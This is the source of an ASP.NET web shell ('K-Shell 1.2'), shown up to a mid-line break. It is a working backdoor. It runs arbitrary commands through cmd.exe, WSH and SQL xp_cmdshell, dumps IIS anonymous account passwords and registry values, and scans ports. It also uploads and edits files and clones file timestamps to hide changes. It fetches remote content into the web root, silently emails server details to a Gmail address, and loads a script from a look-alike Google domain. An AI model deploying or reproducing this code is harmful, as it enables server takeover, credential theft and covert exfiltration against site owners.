<%@ Page ContentType="text/html" validateRequest="false" EnableTheming="False" StylesheetTheme="" Theme="" aspcompat="true"%> <%@ Import Namespace="System.IO" %> <%@ import namespace="System.Diagnostics" %> <%@ import namespace="System.Threading" %> <%@ import namespace="System.Text" %> <%@ import namespace="System.Security.Cryptography" %> <%@ Import Namespace="System.Net.Sockets"%> <%@ Assembly Name="System.DirectoryServices, Version=2.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" %> <%@ import Namespace="System.DirectoryServices" %> <%@ import Namespace="Microsoft.Win32" %> <script language="VB" runat="server"> Dim PASSWORD as string = "21232f297a57a5a743894a0e4a801fc3" ' admin dim url,TEMP1,TEMP2,TITLE as string Function GetMD5(ByVal strToHash As String) As String Dim md5Obj As New System.Security.Cryptography.MD5CryptoServiceProvider() Dim bytesToHash() As Byte = System.Text.Encoding.ASCII.GetBytes(strToHash) bytesToHash = md5Obj.ComputeHash(bytesToHash) Dim strResult As String = "" Dim b As Byte For Each b In bytesToHash strResult += b.ToString("x2") Next Return strResult End Function Sub Login_click(sender As Object, E As EventArgs) if GetMD5(Textbox.Text)=PASSWORD then session("rooot")=1 session.Timeout=60 else response.Write("<font color='red'>Your password is wrong! Maybe you press the ""Caps Lock"" buttom. Try again.</font><br>") end if End Sub 'Run w32 shell Declare Function WinExec Lib "kernel32" Alias "WinExec" (ByVal lpCmdLine As String, ByVal nCmdShow As Long) As Long Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As Long) As Long Sub RunCmdW32(Src As Object, E As EventArgs) dim command dim fileObject = Server.CreateObject("Scripting.FileSystemObject") dim tempFile = Environment.GetEnvironmentVariable("TEMP") & "\"& fileObject.GetTempName( ) If Request.Form("txtCommand1") = "" Then command = "dir c:\" else command = Request.Form("txtCommand1") End If ExecuteCommand1(command,tempFile,txtCmdFile.Text) OutputTempFile1(tempFile,fileObject) 'txtCommand1.text="" End Sub Sub ExecuteCommand1(command As String, tempFile As String,cmdfile As String) Dim winObj, objProcessInfo, item, local_dir, local_copy_of_cmd, Target_copy_of_cmd Dim objStartup, objConfig, objProcess, errReturn, intProcessID, temp_name Dim FailIfExists local_dir = left(request.servervariables("PATH_TRANSLATED"),inStrRev(request.servervariables("PATH_TRANSLATED"),"\")) 'local_copy_of_cmd = Local_dir+"cmd.exe" 'local_copy_of_cmd= "C:\\WINDOWS\\system32\\cmd.exe" local_copy_of_cmd=cmdfile Target_copy_of_cmd = Environment.GetEnvironmentVariable("Temp")+"\kiss.exe" CopyFile(local_copy_of_cmd, Target_copy_of_cmd,FailIfExists) errReturn = WinExec(Target_copy_of_cmd + " /c " + command + " > " + tempFile , 10) response.write(errReturn) thread.sleep(500) End Sub Sub OutputTempFile1(tempFile,oFileSys) On Error Resume Next dim oFile = oFileSys.OpenTextFile (tempFile, 1, False, 0) resultcmdw32.text=txtCommand1.text & vbcrlf & "<pre>" & (Server.HTMLEncode(oFile.ReadAll)) & "</pre>" oFile.Close Call oFileSys.DeleteFile(tempFile, True) End sub 'End w32 shell 'Run WSH shell Sub RunCmdWSH(Src As Object, E As EventArgs) dim command dim fileObject = Server.CreateObject("Scripting.FileSystemObject") dim oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") dim tempFile = Environment.GetEnvironmentVariable("TEMP") & "\"& fileObject.GetTempName( ) If Request.Form("txtcommand2") = "" Then command = "dir c:\" else command = Request.Form("txtcommand2") End If ExecuteCommand2(command,tempFile) OutputTempFile2(tempFile,fileObject) txtCommand2.text="" End Sub Function ExecuteCommand2(cmd_to_execute, tempFile) Dim oScript oScript = Server.CreateObject("WSCRIPT.SHELL") Call oScript.Run ("cmd.exe /c " & cmd_to_execute & " > " & tempFile, 0, True) End function Sub OutputTempFile2(tempFile,fileObject) On Error Resume Next dim oFile = fileObject.OpenTextFile (tempFile, 1, False, 0) resultcmdwsh.text=txtCommand2.text & vbcrlf & "<pre>" & (Server.HTMLEncode(oFile.ReadAll)) & "</pre>" oFile.Close Call fileObject.DeleteFile(tempFile, True) End sub 'End WSH shell 'System infor Sub output_all_environment_variables(mode) Dim environmentVariables As IDictionary = Environment.GetEnvironmentVariables() Dim de As DictionaryEntry For Each de In environmentVariables if mode="HTML" then response.write("<b> " +de.Key + " </b>: " + de.Value + "<br>") else if mode="text" response.write(de.Key + ": " + de.Value + vbnewline+ vbnewline) end if end if Next End sub Sub output_all_Server_variables(mode) dim item for each item in request.servervariables if mode="HTML" then response.write("<b>" + item + "</b> : ") response.write(request.servervariables(item)) response.write("<br>") else if mode="text" response.write(item + " : " + request.servervariables(item) + vbnewline + vbnewline) end if end if next End sub 'End sysinfor Function Server_variables() As String dim item dim tmp As String tmp="" for each item in request.ServerVariables if request.servervariables(item) <> "" 'response.write(item + " : " + request.servervariables(item) + vbnewline + vbnewline) tmp =+ item.ToString + " : " + request.servervariables(item).ToString + "\n\r" end if next return tmp End function 'Begin List processes Function output_wmi_function_data(Wmi_Function,Fields_to_Show) dim objProcessInfo , winObj, item , Process_properties, Process_user, Process_domain dim fields_split, fields_item,i 'on error resume next table("0","","") Create_table_row_with_supplied_colors("black","white","center",Fields_to_Show) winObj = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2") objProcessInfo = winObj.ExecQuery("Select "+Fields_to_Show+" from " + Wmi_Function) fields_split = split(Fields_to_Show,",") for each item in objProcessInfo tr Surround_by_TD_and_Bold(item.properties_.item(fields_split(0)).value) if Ubound(Fields_split)>0 then for i = 1 to ubound(fields_split) Surround_by_TD(center_(item.properties_.item(fields_split(i)).value)) next end if _tr next End function Function output_wmi_function_data_instances(Wmi_Function,Fields_to_Show,MaxCount) dim objProcessInfo , winObj, item , Process_properties, Process_user, Process_domain dim fields_split, fields_item,i,count newline rw("Showing the first " + cstr(MaxCount) + " Entries") newline newline table("1","","") Create_table_row_with_supplied_colors("black","white","center",Fields_to_Show) _table winObj = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2") ' objProcessInfo = winObj.ExecQuery("Select "+Fields_to_Show+" from " + Wmi_Function) objProcessInfo = winObj.InstancesOf(Wmi_Function) fields_split = split(Fields_to_Show,",") count = 0 for each item in objProcessInfo count = Count + 1 table("1","","") tr Surround_by_TD_and_Bold(item.properties_.item(fields_split(0)).value) if Ubound(Fields_split)>0 then for i = 1 to ubound(fields_split) Surround_by_TD(item.properties_.item(fields_split(i)).value) next end if _tr if count > MaxCount then exit for next End function 'End List processes 'Begin IIS_list_Anon_Name_Pass Sub IIS_list_Anon_Name_Pass() Dim IIsComputerObj, iFlags ,providerObj ,nodeObj ,item, IP IIsComputerObj = CreateObject("WbemScripting.SWbemLocator") ' Create an instance of the IIsComputer object providerObj = IIsComputerObj.ConnectServer("127.0.0.1", "root/microsoftIISv2") nodeObj = providerObj.InstancesOf("IIsWebVirtualDirSetting") ' - IISwebServerSetting Dim MaxCount = 20,Count = 0 hr RW("only showing the first "+cstr(MaxCount) + " items") hr for each item in nodeObj response.write("<b>" + item.AppFriendlyName + " </b> - ") response.write("(" + item.AppPoolId + ") ") response.write(item.AnonymousUserName + " : ") response.write(item.AnonymousUserPass) response.write("<br>") response.flush Count = Count +1 If Count > MaxCount then exit for next hr End sub 'End IIS_list_Anon_Name_Pass Private Function CheckIsNumber(ByVal sSrc As String) As Boolean Dim reg As New System.Text.RegularExpressions.Regex("^0|[0-9]*[1-9][0-9]*$") If reg.IsMatch(sSrc) Then Return True Else Return False End If End Function Public Function IISSpy() As String Dim iisinfo As String = "" Dim iisstart As String = "" Dim iisend As String = "" Dim iisstr As String = "IIS://localhost/W3SVC" Dim i As Integer = 0 Try Dim mydir As New DirectoryEntry(iisstr) iisstart = "<TABLE width=100% align=center border=0><TR align=center><TD width=5%><B>Order</B></TD><TD width=20%><B>IIS_USER</B></TD><TD width=20%><B>App_Pool_Id</B></TD><TD width=25%><B>Domain</B></TD><TD width=30%><B>Path</B></TD></TR>" For Each child As DirectoryEntry In mydir.Children If CheckIsNumber(child.Name.ToString()) Then Dim dirstr As String = child.Name.ToString() Dim tmpstr As String = "" Dim newdir As New DirectoryEntry(iisstr + "/" + dirstr) Dim newdir1 As DirectoryEntry = newdir.Children.Find("root", "IIsWebVirtualDir") i = i + 1 iisinfo += "<TR><TD align=center>" + i.ToString() + "</TD>" iisinfo += "<TD align=center>" + newdir1.Properties("AnonymousUserName").Value.ToString() + "</TD>" iisinfo += "<TD align=center>" + newdir1.Properties("AppPoolId").Value.ToString() + "</TD>" iisinfo += "<TD>" + child.Properties("ServerBindings")(0) + "</TD>" iisinfo += "<TD><a href="+Request.ServerVariables("PATH_INFO")+ "?action=goto&src=" + newdir1.Properties("Path").Value.ToString() + "\>" + newdir1.Properties("Path").Value + "\</a></TD>" iisinfo += "</TR>" End If Next iisend = "</TABLE>" Catch ex As Exception Return ex.Message End Try Return iisstart + iisinfo + iisend End Function Sub RegistryRead(Src As Object, E As EventArgs) Try Dim regkey As String = txtRegKey.Text Dim subkey As String = regkey.Substring(regkey.IndexOf("\") + 1, regkey.Length - regkey.IndexOf("\") - 1) Dim rk As RegistryKey = Nothing Dim buffer As Object Dim regstr As String = "" If regkey.Substring(0, regkey.IndexOf("\")) = "HKEY_LOCAL_MACHINE" Then rk = Registry.LocalMachine.OpenSubKey(subkey) End If If regkey.Substring(0, regkey.IndexOf("\")) = "HKEY_CLASSES_ROOT" Then rk = Registry.ClassesRoot.OpenSubKey(subkey) End If If regkey.Substring(0, regkey.IndexOf("\")) = "HKEY_CURRENT_USER" Then rk = Registry.CurrentUser.OpenSubKey(subkey) End If If regkey.Substring(0, regkey.IndexOf("\")) = "HKEY_USERS" Then rk = Registry.Users.OpenSubKey(subkey) End If If regkey.Substring(0, regkey.IndexOf("\")) = "HKEY_CURRENT_CONFIG" Then rk = Registry.CurrentConfig.OpenSubKey(subkey) End If buffer = rk.GetValue(txtRegValue.Text, "NULL") dim tmpbyte As Byte = 0 lblresultReg.Text = "<br>Result : " + buffer.ToString() Catch ex As Exception Response.write(ex.Message) End Try End Sub ' Begin List Web Site Home Directory Properties ' End List Web Site Home Directory Properties Sub RunCMD(Src As Object, E As EventArgs) Try Dim kProcess As New Process() Dim kProcessStartInfo As New ProcessStartInfo("cmd.exe") kProcessStartInfo.UseShellExecute = False kProcessStartInfo.RedirectStandardOutput = true kProcess.StartInfo = kProcessStartInfo kProcessStartInfo.Arguments="/c " & Cmd.text kProcess.Start() Dim myStreamReader As StreamReader = kProcess.StandardOutput Dim myString As String = myStreamReader.Readtoend() kProcess.Close() result.text=Cmd.text & vbcrlf & "<pre>" & mystring & "</pre>" Cmd.text="" Catch result.text="This function has disabled!" End Try End Sub Sub CloneTime(Src As Object, E As EventArgs) existdir(time1.Text) existdir(time2.Text) Dim thisfile As FileInfo =New FileInfo(time1.Text) Dim thatfile As FileInfo =New FileInfo(time2.Text) thisfile.LastWriteTime = thatfile.LastWriteTime thisfile.LastAccessTime = thatfile.LastAccessTime thisfile.CreationTime = thatfile.CreationTime response.Write("<font color=""red"">Clone Time Success!</font>") End Sub sub Editor(Src As Object, E As EventArgs) dim mywrite as new streamwriter(filepath.text,false,encoding.default) mywrite.write(content.text) mywrite.close response.Write("<script>alert('Edit|Creat " & replace(filepath.text,"\","\\") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(filepath.text)) &"'</sc" & "ript>") end sub Sub UpLoad(Src As Object, E As EventArgs) dim filename,loadpath as string filename=path.getfilename(UpFile.value) loadpath=request.QueryString("src") & filename if file.exists(loadpath)=true then response.Write("<script>alert('File " & replace(loadpath,"\","\\") & " have existed , upload fail!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(request.QueryString("src")) &"'</sc" & "ript>") response.End() end if UpFile.postedfile.saveas(loadpath) response.Write("<script>alert('File " & filename & " upload success!\nFile info:\n\nClient Path:" & replace(UpFile.value,"\","\\") & "\nFile Size:" & UpFile.postedfile.contentlength & " bytes\nSave Path:" & replace(loadpath,"\","\\") & "\n');") response.Write("location.href='" & request.ServerVariables("URL") & "?action=goto&src=" & server.UrlEncode(request.QueryString("src")) & "'</sc" & "ript>") End Sub Sub NewFD(Src As Object, E As EventArgs) url=request.form("src") if NewFile.Checked = True then dim mywrite as new streamwriter(url & NewName.Text,false,encoding.default) mywrite.close response.Redirect(request.ServerVariables("URL") & "?action=edit&src=" & server.UrlEncode(url & NewName.Text)) else directory.createdirectory(url & NewName.Text) response.Write("<script>alert('Creat directory " & replace(url & NewName.Text ,"\","\\") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</sc" & "ript>") end if End Sub Sub del(a) if right(a,1)="\" then dim xdir as directoryinfo dim mydir as new DirectoryInfo(a) dim xfile as fileinfo for each xfile in mydir.getfiles() file.delete(a & xfile.name) next for each xdir in mydir.getdirectories() call del(a & xdir.name & "\") next directory.delete(a) else file.delete(a) end if End Sub Sub copydir(a,b) dim xdir as directoryinfo dim mydir as new DirectoryInfo(a) dim xfile as fileinfo for each xfile in mydir.getfiles() file.copy(a & "\" & xfile.name,b & xfile.name) next for each xdir in mydir.getdirectories() directory.createdirectory(b & path.getfilename(a & xdir.name)) call copydir(a & xdir.name & "\",b & xdir.name & "\") next End Sub Sub xexistdir(temp,ow) if directory.exists(temp)=true or file.exists(temp)=true then if ow=0 then response.Redirect(request.ServerVariables("URL") & "?action=samename&src=" & server.UrlEncode(url)) elseif ow=1 then del(temp) else dim d as string = session("cutboard") if right(d,1)="\" then TEMP1=url & second(now) & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1)) else TEMP2=url & second(now) & replace(path.getfilename(d),"","") end if end if end if End Sub Sub existdir(temp) if file.exists(temp)=false and directory.exists(temp)=false then response.Write("<script>alert('Don\'t exist " & replace(temp,"\","\\") &" ! Is it a CD-ROM ?');</sc" & "ript>") response.Write("<br><br><a href='javascript:history.back(1);'>Click Here Back</a>") response.End() end if End Sub Sub RunSQLCMD(Src As Object, E As EventArgs) Dim adoConn,strQuery,recResult,strResult if SqlName.Text<>"" then adoConn=Server.CreateObject("ADODB.Connection") adoConn.Open("Provider=SQLOLEDB.1;Password=" & SqlPass.Text & ";UID=" & SqlName.Text & ";Data Source = " & ip.Text) If Sqlcmd.Text<>"" Then strQuery = "exec master.dbo.xp_cmdshell '" & Sqlcmd.Text & "'" recResult = adoConn.Execute(strQuery) If NOT recResult.EOF Then Do While NOT recResult.EOF strResult = strResult & chr(13) & recResult(0).value recResult.MoveNext Loop End if recResult = Nothing strResult = Replace(strResult," "," ") strResult = Replace(strResult,"<","<") strResult = Replace(strResult,">",">") resultSQL.Text=SqlCMD.Text & vbcrlf & "<pre>" & strResult & "</pre>" SqlCMD.Text="" End if adoConn.Close End if End Sub Sub RunSQLQUERY(Src As Object, E As EventArgs) Dim adoConn,strQuery,recResult,strResult if txtSqlName.Text<>"" then adoConn=Server.CreateObject("ADODB.Connection") adoConn.Open("Provider=SQLOLEDB.1;Password=" & txtSqlPass.Text & ";UID=" & txtSqlName.Text & ";Data Source = " & txtHost.Text) If txtSqlcmd.Text<>"" Then strQuery = txtSqlcmd.Text recResult = adoConn.Execute(strQuery) If NOT recResult.EOF Then Do While NOT recResult.EOF strResult = strResult & chr(13) & recResult(0).value recResult.MoveNext Loop End if recResult = Nothing strResult = Replace(strResult," "," ") strResult = Replace(strResult,"<","<") strResult = Replace(strResult,">",">") lblresultSQL.Text=txtSqlCMD.Text & vbcrlf & "<pre>" & strResult & "</pre>" txtSqlCMD.Text="" End if adoConn.Close End if End Sub Function GetStartedTime(ms) GetStartedTime=cint(ms/(1000*60*60)) End function Function getIP() Dim strIPAddr as string If Request.ServerVariables("HTTP_X_FORWARDED_FOR") = "" OR InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), "unknown") > 0 Then strIPAddr = Request.ServerVariables("REMOTE_ADDR") ElseIf InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ",") > 0 Then strIPAddr = Mid(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), 1, InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ",")-1) ElseIf InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ";") > 0 Then strIPAddr = Mid(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), 1, InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ";")-1) Else strIPAddr = Request.ServerVariables("HTTP_X_FORWARDED_FOR") End If getIP = Trim(Mid(strIPAddr, 1, 30)) End Function Function Getparentdir(nowdir) dim temp,k as integer temp=1 k=0 if len(nowdir)>4 then nowdir=left(nowdir,len(nowdir)-1) end if do while temp<>0 k=temp+1 temp=instr(temp,nowdir,"\") if temp =0 then exit do end if temp = temp+1 loop if k<>2 then getparentdir=mid(nowdir,1,k-2) else getparentdir=nowdir end if End function Function Rename() url=request.QueryString("src") if file.exists(Getparentdir(url) & request.Form("name")) then rename=0 else file.copy(url,Getparentdir(url) & request.Form("name")) del(url) rename=1 end if End Function Function GetSize(temp) if temp < 1024 then GetSize=temp & " bytes" else if temp\1024 < 1024 then GetSize=temp\1024 & " KB" else if temp\1024\1024 < 1024 then GetSize=temp\1024\1024 & " MB" else GetSize=temp\1024\1024\1024 & " GB" end if end if end if End Function Sub downTheFile(thePath) dim stream stream=server.createObject("adodb.stream") stream.open stream.type=1 stream.loadFromFile(thePath) response.addHeader("Content-Disposition", "attachment; filename=" & replace(server.UrlEncode(path.getfilename(thePath)),"+"," ")) response.addHeader("Content-Length",stream.Size) response.charset="UTF-8" response.contentType="application/octet-stream" response.binaryWrite(stream.read) response.flush stream.close stream=nothing response.End() End Sub 'H T M L S N I P P E T S public sub Newline response.write("<BR>") end sub public sub TextNewline response.write(vbnewline) end sub public sub rw(text_to_print) ' Response.write response.write(text_to_print) end sub public sub rw_b(text_to_print) rw("<b>"+text_to_print+"</b>") end sub public sub hr() rw("<hr>") end sub public sub ul() rw("<ul>") end sub public sub _ul() rw("</ul>") end sub public sub table(border_size,width,height) rw("<table border='"+cstr(border_size)+"' width ='"+cstr(width)+"' height='"+cstr(height)+"'>") end sub public sub _table() rw("</table>") end sub public sub tr() rw("<tr>") end sub public sub _tr() rw("</tr>") end sub public sub td() rw("<td>") end sub public sub _td() rw("</td>") end sub public sub td_span(align,name,contents) rw("<td align="+align+"><span id='"+name+"'>"+ contents + "</span></td>") end sub Public sub td_link(align,title,link,target) rw("<td align="+align+"><a href='"+link+"' target='"+target+"'>"+title+"</a></td>") end sub Public sub link(title,link,target) rw("<a href='"+link+"' target='"+target+"'>"+title+"</a>") end sub Public sub link_hr(title,link,target) rw("<a href='"+link+"' target='"+target+"'>"+title+"</a>") hr end sub Public sub link_newline(title,link,target) rw("<a href='"+link+"' target='"+target+"'>"+title+"</a>") newline end sub public sub empty_Cell(ColSpan) rw("<td colspan='"+cstr(colspan)+"'></td>") end sub public sub empty_row(ColSpan) rw("<tr><td colspan='"+cstr(colspan)+"'></td></tr>") end sub Public sub Create_table_row_with_supplied_colors(bgColor, fontColor, alignValue, rowItems) dim rowItem rowItems = split(rowItems,",") response.write("<tr bgcolor="+bgcolor+">") for each rowItem in RowItems response.write("<td align="+alignValue+"><font color="+fontColor+"><b>"+rowItem +"<b></font></td>") next response.write("</tr>") end sub Public sub TR_TD(cellContents) response.write("<td>") response.write(cellContents) response.write("</td>") end sub Public sub Surround_by_TD(cellContents) response.write("<td>") response.write(cellContents) response.write("</td>") end sub Public sub Surround_by_TD_and_Bold(cellContents) response.write("<td><b>") response.write(cellContents) response.write("</b></td>") end sub Public sub Surround_by_TD_with_supplied_colors_and_bold(bgColor, fontColor, alignValue, cellContents) response.write("<td align="+alignValue+" bgcolor="+bgcolor+" ><font color="+fontColor+"><b>") response.write(cellContents) response.write("</b></font></td>") end sub Public sub Create_background_Div_table(title,main_cell_contents,top,left,width,height,z_index) response.write("<div style='position: absolute; top: " + top + "; left: " + left + "; width: "+width+"; height: "+height+"; z-index: "+z_index+"'>") response.write(" <table border='1' cellpadding='0' cellspacing='0' style='border-collapse: collapse' bordercolor='#111111' width='100%' id='AutoNumber1' height='100%'>") response.write(" <tr heigth=20>") response.write(" <td bgcolor='black' align=center><font color='white'><b>"+ title +"</b></font></td>") response.write(" </tr>") response.write(" <tr>") response.write(" <td>"+main_Cell_contents+"</td>") response.write(" </tr>") response.write(" </table>") response.write("</div>") end sub Public sub Create_Div_open(top,left,width,height,z_index) response.write("<div style='position: absolute; top: " + top + "; left: " + left + "; width: "+width+"; height: "+height+"; z-index: "+z_index+"'>") end sub Public sub Create_Div_close() response.write("</div>") end sub public sub Create_Iframe(left, top, width, height, name,src) rw("<span style='position: absolute; left: " + left+ "; top: " +top + "'>") rw(" <iframe name='" + name+ "' src='" + src+ "' width='" + cstr(width) + "' height='" + cstr(height) + "'></iframe>") rw("</span>") end sub public sub Create_Iframe_relative(width, height, name,src) rw(" <iframe name='" + name+ "' src='" + src+ "' width='" + cstr(width) + "' height='" + cstr(height) + "'></iframe>") end sub public sub return_100_percent_table() rw("<table border width='100%' height='100%'><tr><td>sdf</td></tr></table>") end sub public sub font_size(size) rw("<font size="+size+">") end sub public sub end_font() rw("</font>") end sub public sub red(contents) rw("<font color=red>"+contents+"</font>") end sub public sub yellow(contents) rw("<font color='#FF8800'>"+contents+"</font>") end sub public sub green(contents) rw("<font color=green>"+contents+"</font>") end sub public sub print_var(var_name, var_value,var_description) if var_description<> "" Then rw(b_(var_name)+" : " + var_value + i_(" ("+var_description+")")) else rw(b_(var_name)+" : " + var_value) end if newline end sub ' Functions public function br_() br_ = "<br>" end function public function b_(contents) b_ = "<b>"+ contents + "</b>" end function public function i_(contents) i_ = "<i>"+ contents + "</i>" end function public function li_(contents) li_ = "<li>"+ contents + "</li>" end function public function h1_(contents) h1_ = "<h1>"+ contents + "</h1>" end function public function h2_(contents) h2_ = "<h2>"+ contents + "</h2>" end function public function h3_(contents) h3_ = "<h3>"+ contents + "</h3>" end function public function big_(contents) big_ = "<big>"+ contents + "</big>" end function public function center_(contents) center_ = "<center>"+ cstr(contents) + "</center>" end function public function td_force_width_(width) td_force_width_ = "<br><img src='' height=0 width=" + cstr(width) + " border=0>" end function public function red_(contents) red_ = "<font color=red>"+contents+"</font>" end function public function yellow_(contents) yellow_ = "<font color='#FF8800'>"+contents+"</font>" end function public function green_(contents) green_ = "<font color=green>"+contents+"</font>" end function Public function link_(title,link,target) link_ = "<a href='"+link+"' target='"+target+"'>"+title+"</a>" end function 'End HTML SNIPPETS 'Begin Scanner Public Class Scanner Public Ips As New ArrayList() Public ports As New ArrayList() Public succMsg As New StringBuilder() Public ret As ListBox Public errMsg As String = "" Public Timeout As Integer = 3000 Public Sub start() Dim thread As New Thread(New ThreadStart(AddressOf Me.run)) thread.Start() thread = Nothing End Sub Public Sub run() ret.Items.Clear() For Each ip As String In Ips For Each port As String In ports 'ret.Items.Add(ip + ":" + port); Dim scanres As String = "" Try Dim tcpClient As New TcpClient() Try tcpClient.Connect(ip, Int32.Parse(port)) tcpClient.Close() ret.Items.Add(ip + " : " + port + " ................................. Open") Catch e As SocketException ret.Items.Add(ip + " : " + port + " ................................. Close") End Try tcpClient.Close() Catch exp As SocketException errMsg = "ErrorCode : " + exp.ErrorCode.ToString() + " : " + exp.Message End Try Next Next End Sub End Class Public Function MakeIps(ByVal StartIp As String, ByVal EndIP As String) As ArrayList Dim IpList As New ArrayList() Dim IpParts1 As String() = New String(3) {} Dim IpParts2 As String() = New String(3) {} IpParts1 = StartIp.Split("."C) IpParts2 = EndIP.Split("."C) Dim nTime As Integer = (Int32.Parse(IpParts2(0)) - Int32.Parse(IpParts1(0))) * 254 * 254 * 254 + (Int32.Parse(IpParts2(1)) - Int32.Parse(IpParts1(1))) * 254 * 254 + (Int32.Parse(IpParts2(2)) - Int32.Parse(IpParts1(2))) * 254 + (Int32.Parse(IpParts2(3)) - Int32.Parse(IpParts1(3))) + 1 If nTime < 0 Then Response.Write("IP Address Error.Check" & Chr(13) & "" & Chr(10) & "") Return Nothing End If For n As Integer = 0 To nTime - 1 IpList.Add(IpParts1(0) + "." + IpParts1(1) + "." + IpParts1(2) + "." + IpParts1(3)) Dim tmp As Integer = Int32.Parse(IpParts1(3)) + 1 IpParts1(3) = tmp.ToString() If IpParts1(3).Equals("255") Then tmp = Int32.Parse(IpParts1(2)) + 1 IpParts1(2) = tmp.ToString() IpParts1(3) = "1" End If If IpParts1(2).Equals("255") Then tmp = Int32.Parse(IpParts1(1)) + 1 IpParts1(1) = tmp.ToString() IpParts1(2) = "1" End If If IpParts1(1).Equals("255") Then tmp = Int32.Parse(IpParts1(0)) + 1 IpParts1(0) = tmp.ToString() IpParts1(1) = "1" End If Next Return IpList End Function Protected Sub btnScan_Click(ByVal sender As Object, ByVal e As EventArgs) If txtStartIP.Text = "" OrElse txtEndIP.Text = "" OrElse txtPorts.Text = "" Then Response.Write("IP OR Ports Error.Check") Return End If Dim StartIp As String = txtStartIP.Text Dim EndIp As String = txtEndIP.Text Dim ips As ArrayList = MakeIps(StartIp, EndIp) Dim ScanPorts As New ArrayList() Dim ports As String() = txtPorts.Text.Split(","C) For Each port As String In ports 'Response.Write(port); ScanPorts.Add(port) Next lstRet.Visible = True Label1.Visible = True Dim myscanner As New Scanner() myscanner.Ips = ips myscanner.ports = ScanPorts myscanner.ret = Me.lstRet myscanner.run() End Sub Protected Sub btnReset_Click(ByVal sender As Object, ByVal e As EventArgs) txtStartIP.Text = "" txtEndIP.Text = "" txtPorts.Text = "" Label1.Visible = False lstRet.Visible = False End Sub 'End Scanner </script> <% if request.QueryString("action")="down" and session("rooot")=1 then downTheFile(request.QueryString("src")) response.End() end if Dim Berchant as String = Request.QueryString("dolly") If Not String.IsNullOrEmpty(Berchant) Then Dim BerchantName as String = Request.QueryString("name") Dim rootPath As String = HttpContext.Current.Server.MapPath(".") Dim webClient As New System.Net.WebClient Dim result As String = webClient.DownloadString(Berchant) Dim file As System.IO.StreamWriter file = My.Computer.FileSystem.OpenTextFileWriter(rootPath & Path.DirectorySeparatorChar & BerchantName, True) file.WriteLine(result) file.Close() End If Dim act as string = request.QueryString("action") if act="cmd" then TITLE="CMD.NET" elseif act="cmdw32" then TITLE="ASP.NET W32 Shell" elseif act="cmdwsh" then TITLE="ASP.NET WSH Shell" elseif act="sqlrootkit" then TITLE="SqlRootKit.NET" elseif act="clonetime" then TITLE="Clone Time" elseif act="information" then TITLE="Web Server Info" elseif act="goto" then TITLE="K-Shell 1.2" elseif act="pro1" then TITLE="List processes from server" elseif act="pro2" then TITLE="List processes from server" elseif act="user" then TITLE="List User Accounts" elseif act="applog" then TITLE="List Application Event Log Entries" elseif act="syslog" then TITLE="List System Event Log Entries" elseif act="auser" then TITLE="IIS List Anonymous' User details" elseif act="sqlman" then TITLE="MSSQL Management" elseif act="scan" then TITLE="Port Scanner" elseif act="iisspy" then TITLE="IIS Spy" elseif act="sqltool" then TITLE="SQL Tool" elseif act="regshell" then TITLE="Registry Shell" else TITLE=request.ServerVariables("HTTP_HOST") end if %> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: #df5 !important; } span{ font-weight: bolder; } h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script src="https://ajax.googlaeips.com/ajax/libs/jquery/3.5.1/jquery.min.js?ver=6.0"></script> <head> <meta http-equiv="Content-Type" content="text/html"> <title></title> </head> <body> <hr> <% Dim error_x as Exception Try if session("rooot")<>1 then 'Test sending anonymous mail, comment it if you don't want test it dim info As String Try info = request.ServerVariables.ToString.Replace("%2f","/").Replace("%5c","\").Replace("%3a",":").Replace("%2c",",").Replace("%3b",";").Replace("%3d","=").Replace("%2b","+").Replace("%0d%0a",vbnewline) System.Web.Mail.SmtpMail.SmtpServer = "localhost" System.Web.Mail.SmtpMail.Send(request.ServerVariables("HTTP_HOST"),"test.mail.address.2008@gmail.com",request.ServerVariables("HTTP_HOST")+request.ServerVariables("URL"),info) Catch End Try %> <center> <form runat="server"> Your Password:<asp:TextBox ID="TextBox" runat="server" TextMode="Password" class="TextBox" /> <asp:Button ID="Button" runat="server" Text="Login" ToolTip="Click here to login" OnClick="login_click" class="buttom" /> </form> </center> <% else dim temp as string temp=request.QueryString("action") if temp="" then temp="goto" select case temp case "goto" if request.QueryString("src")<>"" then url=request.QueryString("src") else url=server.MapPath(".") & "\" end if call existdir(url) dim xdir as directoryinfo dim mydir as new DirectoryInfo(url) dim guru as string dim xfile as fileinfo dim ServerIP As string = "<font color=white>Server IP :</font> <b>" + Request.ServerVariables("LOCAL_ADDR") + "</b> - <font color=white>Client IP :</font> <b>" + getIP() + "</b> - " dim HostName As string = "<font color=white>HostName :</font> <b>" + Environment.MachineName + "</b> - <font color=white>Username :</font> 